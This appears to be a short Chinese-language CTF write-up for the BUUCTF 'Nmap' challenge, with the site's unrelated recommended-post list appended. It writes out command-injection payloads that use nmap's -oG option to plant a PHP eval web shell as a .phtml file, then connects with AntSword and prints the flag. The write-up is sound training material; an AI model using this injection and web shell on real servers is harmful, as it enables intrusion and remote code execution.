BUUCTF——Nmap

BUUCTF------Nmap

进入靶场

类似于一个nmap的网站

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

应该有过滤 加了个\

直接构造个php木马上传试试

复制代码
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

复制代码
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看

成功连接

接下来就慢慢找flag

在根目录下找到flag

复制代码
flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

相关推荐
FakeOccupational11 分钟前
【碎碎念】宝可梦 Mesh GO : 基于MESH网络的口袋妖怪 宝可梦GO游戏自组网系统
网络·游戏
fei_sun2 小时前
【计算机网络】三报文握手建立TCP连接
网络·tcp/ip·计算机网络
Johny_Zhao3 小时前
2025年6月Docker镜像加速失效终极解决方案
linux·网络·网络安全·docker·信息安全·kubernetes·云计算·containerd·yum源·系统运维
PypYCCcccCc3 小时前
支付系统架构图
java·网络·金融·系统架构
搬码临时工4 小时前
如何把本地服务器变成公网服务器?内网ip网址转换到外网连接访问
运维·服务器·网络·tcp/ip·智能路由器·远程工作·访问公司内网
zzc9214 小时前
MATLAB仿真生成无线通信网络拓扑推理数据集
开发语言·网络·数据库·人工智能·python·深度学习·matlab
Guheyunyi5 小时前
监测预警系统重塑隧道安全新范式
大数据·运维·人工智能·科技·安全
IT科技那点事儿6 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
人工智能·安全
竹言笙熙6 小时前
Polarctf2025夏季赛 web java ez_check
java·学习·web安全
朱包林8 小时前
day27-shell编程(自动化)
linux·运维·服务器·网络·shell脚本